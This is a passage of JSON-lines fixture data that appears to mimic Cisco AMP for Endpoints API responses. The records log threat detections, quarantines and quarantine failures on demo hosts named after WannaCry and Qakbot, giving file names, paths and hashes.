Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 